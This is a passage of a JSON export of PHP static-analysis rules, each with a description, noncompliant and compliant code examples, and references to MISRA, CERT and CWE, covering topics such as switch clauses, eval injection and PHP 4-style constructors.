<\/li>\n <li> MISRA C++:2008, 2-7-3 - Sections of code should not be \"commented out\" using C++ comments. <\/li>\n <li> MISRA C:2012, Dir. 4.4 - Sections of code should not be \"commented out\" <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S126","repo":"php","name":"\"if ... else if\" constructs should end with \"else\" clauses","htmlDesc":"<p>This rule applies whenever an <code>if<\/code> statement is followed by one or more <code>else if<\/code> statements; the final <code>else if<\/code>\nshould be followed by an <code>else<\/code> statement.<\/p>\n<p>The requirement for a final <code>else<\/code> statement is defensive programming.<\/p>\n<p>The <code>else<\/code> statement should either take appropriate action or contain a suitable comment as to why no action is taken. This is\nconsistent with the requirement to have a final <code>default<\/code> clause in a <code>switch<\/code> statement.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (condition1) {\n do_something();\n} else if (condition2) {\n do_something_else();\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (condition1) {\n do_something();\n} else if (condition2) {\n do_something_else();\n} else {\n throw new InvalidArgumentException('message');\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 14.10 - All if...else if constructs shall be terminated with an else clause. <\/li>\n <li> MISRA C++:2008, 6-4-2 - All if...else if constructs shall be terminated with an else clause. <\/li>\n <li> MISRA C:2012, 15.7 - All if...else if constructs shall be terminated with an else statement <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/YgE\">CERT, MSC01-C.<\/a> - Strive for logical completeness <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/JoIyAQ\">CERT, MSC01-CPP.<\/a> - Strive for logical completeness <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/PQHRAw\">CERT, MSC57-J.<\/a> - Strive for logical completeness <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1264","repo":"php","name":"A \"while\" loop should be used instead of a \"for\" loop","htmlDesc":"<p>When only the condition expression is defined in a <code>for<\/code> loop, but the init and increment expressions are missing, a <code>while<\/code>\nloop should be used instead to increase readability. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfor (;condition;) { \/*...*\/ }\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nwhile (condition) { \/*...*\/ }\n<\/pre>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S127","repo":"php","name":"\"for\" loop stop conditions should be invariant","htmlDesc":"<p>A <code>for<\/code> loop stop condition should test the loop counter against an invariant value (i.e. one that is true at both the beginning and\nending of every loop iteration). Ideally, this means that the stop condition is set to a local variable just before the loop begins. <\/p>\n<p>Stop conditions that are not invariant are slightly less efficient, as well as being difficult to understand and maintain, and likely lead to the\nintroduction of errors in the future.<\/p>\n<p>This rule tracks three types of non-invariant stop conditions:<\/p>\n<ul>\n <li> When the loop counters are updated in the body of the <code>for<\/code> loop <\/li>\n <li> When the stop condition depend upon a method call <\/li>\n <li> When the stop condition depends on an object property, since such properties could change during the execution of the loop. <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfor ($i = 0; $i < 10; $i++) {\n echo $i;\n if(condition) {\n $i = 20;\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfor ($i = 0; $i < 10; $i++) {\n echo $i;\n}\n\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 13.6 - Numeric variables being used within a <em>for<\/em> loop for iteration counting shall not be modified in the body of the\n loop. <\/li>\n <li> MISRA C++:2008, 6-5-3 - The <em>loop-counter<\/em> shall not be modified within <em>condition<\/em> or <em>statement<\/em>. <\/li>\n<\/ul>","status":"READY","tags":["rank4"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S128","repo":"php","name":"Switch cases should end with an unconditional \"break\" statement","htmlDesc":"<p>When the execution is not explicitly terminated at the end of a switch case, it continues to execute the statements of the following case. While\nthis is sometimes intentional, it often is a mistake which leads to unexpected behavior. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch ($myVariable) {\n case 1:\n foo();\n break;\n case 2: \/\/ Both 'doSomething()' and 'doSomethingElse()' will be executed. Is it on purpose ?\n do_something();\n default:\n do_something_else();\n break;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nswitch ($myVariable) {\n case 1:\n foo();\n break;\n case 2:\n do_something();\n break;\n default:\n do_something_else();\n break;\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>This rule is relaxed in following cases:<\/p>\n<pre>\nswitch ($myVariable) {\n case 0: \/\/ Empty case used to specify the same behavior for a group of cases.\n case 1:\n do_something();\n break;\n case 2: \/\/ Use of continue statement\n continue;\n case 3: \/\/ Case includes a jump statement (exit, return, break &etc)\n exit(0);\n case 4:\n echo 'Second case, which falls through';\n \/\/ no break <- comment is used when fall-through is intentional in a non-empty case body\n default: \/\/ For the last case, use of break statement is optional\n doSomethingElse();\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 15.0 - The MISRA C <em>switch<\/em> syntax shall be used. <\/li>\n <li> MISRA C:2004, 15.2 - An unconditional break statement shall terminate every non-empty switch clause <\/li>\n <li> MISRA C++:2008, 6-4-3 - A switch statement shall be a well-formed switch statement. <\/li>\n <li> MISRA C++:2008, 6-4-5 - An unconditional throw or break statement shall terminate every non-empty switch-clause <\/li>\n <li> MISRA C:2012, 16.1 - All switch statements shall be well-formed <\/li>\n <li> MISRA C:2012, 16.3 - An unconditional break statement shall terminate every switch-clause <\/li>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/484.html\">MITRE, CWE-484<\/a> - Omitted Break Statement in Switch <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/YIFLAQ\">CERT, MSC17-C.<\/a> - Finish every set of statements associated with a case\n label with a break statement <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/ZoFLAQ\">CERT, MSC18-CPP.<\/a> - Finish every set of statements associated with a case\n label with a break statement <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/ewHAAQ\">CERT, MSC52-J.<\/a> - Finish every set of statements associated with a case\n label with a break statement <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1301","repo":"php","name":"\"switch\" statements should have at least 3 \"case\" clauses","htmlDesc":"<p><code>switch<\/code> statements are useful when there are many different cases depending on the value of the same expression.<\/p>\n<p>For just one or two cases however, the code will be more readable with <code>if<\/code> statements.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch ($variable) {\n case 0:\n do_something();\n break;\n default:\n do_something_else();\n break;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif ($variable == 0) {\n do_something();\n} else {\n do_something_else();\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 15.5 - Every switch statement shall have at least one case clause. <\/li>\n <li> MISRA C++:2008, 6-4-8 - Every switch statement shall have at least one case-clause. <\/li>\n <li> MISRA C:2012, 16.6 - Every switch statement shall have at least two switch-clauses <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S131","repo":"php","name":"Statements should end with a \"case default\" clause","htmlDesc":"<p>The requirement for a final <code>case default<\/code> clause is defensive programming. The clause should either take appropriate action, or contain\na suitable comment as to why no action is taken. Even when the <code>switch<\/code> covers all current values of an <code>enum<\/code>, a default case\nshould still be used because there is no guarantee that the <code>enum<\/code> won't be extended.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch ($param) { \/\/missing default clause\n case 0:\n do_something();\n break;\n case 1:\n do_something_else();\n break;\n}\n\nswitch ($param) {\n default: \/\/ default clause should be the last one\n error();\n break;\n case 0:\n do_something();\n break;\n case 1:\n do_something_else();\n break;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nswitch ($param) {\n case 0:\n do_something();\n break;\n case 1:\n do_something_else();\n break;\n default:\n error();\n break;\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 15.0 - The MISRA C <em>switch<\/em> syntax shall be used. <\/li>\n <li> MISRA C:2004, 15.3 - The final clause of a switch statement shall be the default clause <\/li>\n <li> MISRA C++:2008, 6-4-3 - A switch statement shall be a well-formed switch statement. <\/li>\n <li> MISRA C++:2008, 6-4-6 - The final clause of a switch statement shall be the default-clause <\/li>\n <li> MISRA C:2012, 16.1 - All switch statements shall be well-formed <\/li>\n <li> MISRA C:2012, 16.4 - Every <em>switch<\/em> statement shall have a <em>default<\/em> label <\/li>\n <li> MISRA C:2012, 16.5 - A <em>default<\/em> label shall appear as either the first or the last <em>switch label<\/em> of a <em>switch<\/em> statement\n <\/li>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/478.html\">MITRE, CWE-478<\/a> - Missing Default Case in Switch Statement <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/YgE\">CERT, MSC01-C.<\/a> - Strive for logical completeness <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/JoIyAQ\">CERT, MSC01-CPP.<\/a> - Strive for logical completeness <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S134","repo":"php","name":"Control flow statements \"if\", \"for\", \"while\", \"switch\" and \"try\" should not be nested too deeply","htmlDesc":"<p>Nested <code>if<\/code>, <code>for<\/code>, <code>while<\/code>, <code>switch<\/code>, and <code>try<\/code> statements is a key ingredient for making\nwhat's known as \"Spaghetti code\".<\/p>\n<p>Such code is hard to read, refactor and therefore maintain.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default threshold of 3:<\/p>\n<pre>\n if (condition1) { \/\/ Compliant - depth = 1\n ...\n if (condition2) { \/\/ Compliant - depth = 2\n ...\n for($ = 0; $i < 10; $i++) { \/\/ Compliant - depth = 3, not exceeding the limit\n ...\n if (condition4) { \/\/ Non-Compliant - depth = 4\n if (condition5) { \/\/ Depth = 5, exceeding the limit, but issues are only reported on depth = 4\n ...\n }\n return;\n }\n }\n }\n }\n<\/pre>","status":"READY","tags":["rank5"],"langName":"PHP","params":[{"key":"max","htmlDesc":"Maximum allowed control flow statement nesting depth.","defaultValue":"4","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S138","repo":"php","name":"Functions should not have too many lines","htmlDesc":"<p>A function that grows too large tends to aggregate too many responsibilities.<\/p>\n<p>Such functions inevitably become harder to understand and therefore harder to maintain. <\/p>\n<p>Above a specific threshold, it is strongly advised to refactor into smaller functions which focus on well-defined tasks.<\/p>\n<p>Those smaller functions will not only be easier to understand, but also probably easier to test.<\/p>","status":"READY","tags":["rank3"],"langName":"PHP","params":[{"key":"max","htmlDesc":"Maximum authorized lines in a function","defaultValue":"150","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S139","repo":"php","name":"Comments should not be located at the end of lines of code","htmlDesc":"<p>This rule verifies that single-line comments are not located at the ends of lines of code. The main idea behind this rule is that in order to be\nreally readable, trailing comments would have to be properly written and formatted (correct alignment, no interference with the visual structure of\nthe code, not too long to be visible) but most often, automatic code formatters would not handle this correctly: the code would end up less readable.\nComments are far better placed on the previous empty line of code, where they will always be visible and properly formatted.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$a = $b + $c; \/\/ This is a trailing comment that can be very very long\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n\/\/ This very long comment is better placed before the line of code\n$a = $b + $c;\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[{"key":"legalTrailingCommentPattern","htmlDesc":"Pattern for text of trailing comments that are allowed. By default, comments containing only one word.","defaultValue":"^(\/\/|#)\\s*+[^\\s]++$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"php:S1479","repo":"php","name":"\"switch\" statements should not have too many \"case\" clauses","htmlDesc":"<p>When <code>switch<\/code> statements have large sets of <code>case<\/code> clauses, it is usually an attempt to map two sets of data. A real map\nstructure would be more readable and maintainable, and should be used instead.<\/p>","status":"READY","tags":["rank5"],"langName":"PHP","params":[{"key":"max","htmlDesc":"Maximum number of case","defaultValue":"30","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S1481","repo":"php","name":"Unused local variables should be removed","htmlDesc":"<p>If a local variable is declared but not used, it is dead code and should be removed. Doing so will improve maintainability because developers will\nnot wonder what the variable is used for.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction numberOfMinutes($hours) {\n $seconds = 0; \/\/ seconds is never used\n return hours * 60;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction numberOfMinutes($hours) {\n return hours * 60;\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1488","repo":"php","name":"Local Variables should not be declared and then immediately returned or thrown","htmlDesc":"<p>Declaring a variable only to immediately return or throw it is a bad practice.<\/p>\n<p>Some developers argue that the practice improves code readability, because it enables them to explicitly name what is being returned. However, this\nvariable is an internal implementation detail that is not exposed to the callers of the method. The method name should be sufficient for callers to\nknow exactly what will be returned.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction compute_duration_in_milliseconds() {\n $duration = ((($hours * 60) + $minutes) * 60 + $seconds ) * 1000 ;\n return $duration;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction compute_duration_in_milliseconds() {\n return ((($hours * 60) + $minutes) * 60 + $seconds ) * 1000;\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1523","repo":"php","name":"Code should not be dynamically injected and executed","htmlDesc":"<p>The <code>eval<\/code> function is a way to run arbitrary code at run-time. <\/p>\n<p>According to the PHP documentation<\/p>\n<blockquote>\n <p>The eval() language construct is very dangerous because it allows execution of arbitrary PHP code. Its use thus is discouraged. If you have\n carefully verified that there is no other option than to use this construct, pay special attention not to pass any user provided data into it\n without properly validating it beforehand.<\/p>\n<\/blockquote>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\neval($code_to_be_dynamically_executed)\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/95.html\">MITRE CWE-95<\/a> - CWE-95: Improper Neutralization of Directives in Dynamically\n Evaluated Code ('Eval Injection') <\/li>\n <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A3-Cross-Site_Scripting_(XSS)\">OWASP Top Ten 2013 Category A3<\/a> - Cross-Site Scripting\n (XSS) <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S1536","repo":"php","name":"Function argument names should be unique","htmlDesc":"<p>Function arguments should all have different names to prevent any ambiguity. Indeed, if arguments have the same name, the last duplicated argument\nhides all the previous arguments with the same name. This hiding makes no sense, reduces understandability and maintainability, and obviously can be\nerror prone. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction compute($a, $a, $c) { \/\/ Noncompliant\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction compute($a, $b, $c) { \/\/ Compliant\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1599","repo":"php","name":"Variable variables should not be used","htmlDesc":"<p>PHP's \"variable variables\" feature (dynamically-named variables) is temptingly powerful, but can lead to unmaintainable code. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$var = 'foo';\n$$var = 'bar'; \/\/Noncompliant\n$$$var = 'hello'; \/\/Noncompliant\n\necho $foo; \/\/will display 'bar'\necho $bar; \/\/will display 'hello'\n<\/pre>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1600","repo":"php","name":"Deprecated predefined variables should not be used","htmlDesc":"<p>The following predefined variables are deprecated and should be replaced by the new versions:<\/p>\n<table>\n <tbody>\n <tr>\n <th>Replace<\/th>\n <th>With<\/th>\n <\/tr>\n <tr>\n <td>$HTTP_SERVER_VARS<\/td>\n <td>$_SERVER<\/td>\n <\/tr>\n <tr>\n <td>$HTTP_GET_VARS<\/td>\n <td>$_GET<\/td>\n <\/tr>\n <tr>\n <td>$HTTP_POST_VARS<\/td>\n <td>$_POST<\/td>\n <\/tr>\n <tr>\n <td>$HTTP_POST_FILES<\/td>\n <td>$_FILES<\/td>\n <\/tr>\n <tr>\n <td>$HTTP_SESSION_VARS<\/td>\n <td>$_SESSION<\/td>\n <\/tr>\n <tr>\n <td>$HTTP_ENV_VARS<\/td>\n <td>$_ENV<\/td>\n <\/tr>\n <tr>\n <td>$HTTP_COOKIE_VARS<\/td>\n <\/tr>\n <\/tbody>\n<\/table>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\necho 'Name parameter value: ' . $HTTP_GET_VARS[\"name\"];\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\necho 'Name parameter value: ' . $_GET[\"name\"];\n<\/pre>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1603","repo":"php","name":"PHP 4 constructor declarations should not be used","htmlDesc":"<p>In PHP 4, any function with the same name as the nesting class was considered a class constructor. In PHP 5, this mechanism has been deprecated and\nthe \"__construct\" method name should be used instead. If both styles are present in the same class, PHP 5 will treat the function named \"__construct\"\nas the class constructor. <\/p>\n<p>This rule rule raises an issue for each method with the same name as the enclosing class.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Foo {\n function Foo(){...}\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass Foo {\n function __construct(){...}\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1605","repo":"php","name":"\"__construct\" functions should not make PHP 4-style calls to parent constructors","htmlDesc":"<p>In PHP 5 both the way to declare a constructor and the way to make a call to a parent constructor have evolved. When declaring constructors with\nthe PHP5 <code>__construct<\/code> name, nested calls to parent constructors should also use the new <code>__constructor<\/code> name.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Foo extends Bar {\n function __construct() {\n parent::Bar();\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass Foo extends Bar {\n function __construct() {\n parent::__construct();\n }\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1656","repo":"php","name":"Variables should not be self-assigned","htmlDesc":"<p>There is no reason to re-assign a variable to itself. Either this statement is redundant and should be removed, or the re-assignment is a mistake\nand some other value or variable was intended for the assignment instead.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\npublic function setName($name) {\n $name = $name;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic function setName($name) {\n $this->name = $name;\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n executed <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1757","repo":"php","name":"\"<?php\" and \"<?=\" tags should be used","htmlDesc":"<p>Coding conventions allow teams to collaborate effectively. For maximum standardization and readability, PHP code should use the long <code><?php\n?><\/code> tags or the short-echo <code><?= ?><\/code> tags; it should not use the other tag variations.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n<?\n$foo = 1;\n?>\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n<?php\n$foo = 1;\n?>\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1763","repo":"php","name":"Jump statements should not be followed by other statements","htmlDesc":"<p>Jump statements (<code>return<\/code>, <code>break<\/code>, <code>continue<\/code>, and <code>goto<\/code>) and <code>throw<\/code> expressions move\ncontrol flow out of the current code block. Typically, any statements in a block that come after a jump or <code>throw<\/code> are simply wasted\nkeystrokes lying in wait to confuse the unwary. <\/p>\n<p>Rarely, as illustrated below, code after a jump or <code>throw<\/code> is reachable. However, such code is difficult to understand, and should be\nrefactored. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction fun($a) {\n $i = 10;\n return $i + $a;\n $i++; \/\/ this is never executed\n}\n\nfunction foo($a) {\n if ($a == 5) {\n goto error;\n } else {\n \/\/ do the job\n }\n return;\n\n error:\n printf(\"don't use 5\"); \/\/ this is reachable but unreadable\n\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction fun($a) {\n $i = 10;\n return $i + $a;\n}\n\nfunction foo($a) {\n if ($a == 5) {\n handleError();\n } else {\n \/\/ do the job\n }\n return;\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C++:2008, 0-1-9 - There shall be no dead code <\/li>\n <li> MISRA C:2012, 2.2 - There shall be no dead code <\/li>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/561.html\">MITRE, CWE-561<\/a> - Dead Code <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n executed <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/OYIyAQ\">CERT, MSC07-CPP.<\/a> - Detect and remove dead code <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1764","repo":"php","name":"Identical expressions should not be used on both sides of a binary operator","htmlDesc":"<p>Using the same value on either side of a binary operator is almost always a mistake. In the case of logical operators, it is either a copy\/paste\nerror and therefore a bug, or it is simply wasted code, and should be simplified. In the case of bitwise operators and most binary mathematical\noperators, having the same value on both sides of an operator yields predictable results, and should be simplified.<\/p>\n<p>This rule ignores <code>*<\/code>, <code>+<\/code>, and <code>=<\/code>. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif ( $a == $a ) { \/\/ always true\n doZ();\n}\nif ( $a != $a ) { \/\/ always false\n doY();\n}\nif ( $a == $b && $a == $b ) { \/\/ if the first one is true, the second one is too\n doX();\n}\nif ( $a == $b || $a == $b ) { \/\/ if the first one is true, the second one is too\n doW();\n}\n\n$j = 5 \/ 5; \/\/always 1\n$k = 5 - 5; \/\/always 0\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Left-shifting 1 onto 1 is common in the construction of bit masks, and is ignored.<\/p>\n<pre>\n$i = 1 << 1; \/\/ Compliant\n$j = $a << $a; \/\/ Noncompliant\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n executed <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n <li> <a href='\/coding_rules#rule_key=php%3AS1656'>S1656<\/a> - Implements a check on <code>=<\/code>. <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1765","repo":"php","name":"The \"var\" keyword should not be used","htmlDesc":"<p>The PHP 4 method of declaring a variable, using the <code>var<\/code> keyword, was deprecated in early versions of PHP 5. Even though it's not\nconsidered deprecated in the most recent versions, it's nonetheless not best practice to use it. When <code>var<\/code> does appear, it is interpreted\nas a synonym for <code>public<\/code> and treated as such. Therefore <code>public<\/code> should be used instead.<\/p>\n<p>From the PHP Manual:<\/p>\n<blockquote>\n <p>The PHP 4 method of declaring a variable with the var keyword is still supported for compatibility reasons (as a synonym for the public keyword).\n In PHP 5 before 5.1.3, its usage would generate an E_STRICT warning.<\/p>\n<\/blockquote>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n<?php\nclass Foo\n{\n var $bar = 1;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n<?php\nclass Foo\n{\n public $bar = 1;\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1766","repo":"php","name":"More than one property should not be declared per statement","htmlDesc":"<p>For better readability, do not put multiple property declarations in the same statement.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n<?php\nclass Foo\n{\n private $bar = 1, $bar2 = 2;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n<?php\nclass Foo\n{\n private $bar1 = 1;\n private $bar2 = 2;\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1779","repo":"php","name":"Only LF character (Unix-like) should be used to end lines","htmlDesc":"<p>All developers should use the same end-line character(s) to prevent polluting the history changelog of source files in the SCM engine. Moreover\nsome SCM engines like Git might sometimes badly support use of Windows 'CRLF' end of line characters.<\/p>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1780","repo":"php","name":"Closing tag \"?>\" should be omitted on files containing only PHP","htmlDesc":"<p>According to the PSR2 coding standard:<\/p>\n<blockquote>\n <p>The closing <code>?><\/code> tag should be omitted from files containing only PHP.<\/p>\n<\/blockquote>\n<p>According to the PHP manual:<\/p>\n<blockquote>\n <p>in some cases omitting it is helpful when using include or require, so unwanted whitespace will not occur at the end of files, and you will still\n be able to add headers to the response later. It is also handy if you use output buffering, and would not like to see added unwanted whitespace at\n the end of the parts generated by the included files.<\/p>\n<\/blockquote>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1781","repo":"php","name":"PHP keywords and constants \"true\", \"false\", \"null\" should be lower case","htmlDesc":"<p>Using indifferently lower or upper case for PHP keywords and constants \"true\", \"false\" and \"null\" can impact the readability of PHP source\ncode.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n<?php ECHO 'Hello World'; ?>\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n<?php echo 'Hello World'; ?>\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1784","repo":"php","name":"Method visibility should be explicitly declared","htmlDesc":"<p>Class methods may be defined as public, private, or protected. Methods declared without any explicit visibility keyword are defined as public. To\nprevent any misunderstanding, this visibility should always be explicitly declared.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction foo(){...}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic function foo(){...}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1788","repo":"php","name":"Method arguments with default values should be last","htmlDesc":"<p>The ability to define default values for method arguments can make a method easier to use. Default argument values allow callers to specify as many\nor as few arguments as they want while getting the same functionality and minimizing boilerplate, wrapper code. <\/p>\n<p>But all method arguments with default values should be declared after the method arguments without default values. Otherwise, it makes it\nimpossible for callers to take advantage of defaults; they must re-specify the defaulted values in order to \"get to\" the non-default arguments.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction makeyogurt($type = \"acidophilus\", $flavor){...} \/\/ Noncompliant\n\nmakeyogurt(\"raspberry\")}} \/\/ Runtime error: Missing argument 2 in call to makeyogurt()\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction makeyogurt($flavor, $type = \"acidophilus\", ){...}\n\nmakeyogurt(\"raspberry\")}} \/\/ Works as expected\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1793","repo":"php","name":"\"elseif\" keyword should be used in place of \"else if\" keywords","htmlDesc":"<p>According to the PSR2 coding standard:<\/p>\n<blockquote>\n <p>The keyword <code>elseif<\/code> SHOULD be used instead of <code>else if<\/code> so that all control keywords look like single words.<\/p>\n<\/blockquote>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif ($expr1) {\n ...\n} else if ($expr2) {\n ...\n} else {...}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif ($expr1) {\n ...\n} elseif ($expr2) {\n ...\n} else {...}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1799","repo":"php","name":"\"exit(...)\" and \"die(...)\" statements should not be used","htmlDesc":"<p>The <code>exit(...)<\/code> and <code>die(...)<\/code> statements should absolutely not be used in Web PHP pages as this might lead to a very bad\nuser experience. In such case, the end user might have the feeling that the web site is down or has encountered a fatal error. <\/p>\n<p>But of course PHP can also be used to develop command line application and in such case use of <code>exit(...)<\/code> or <code>die(...)<\/code>\nstatement can be justified but must remain limited and not spread all over the application. We expect exceptions to be used to handle errors and those\nexceptions should be caught just before leaving the application to specify the exit code with help of <code>exit(...)<\/code> or <code>die(...)<\/code>\nstatements.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Foo {\n public function 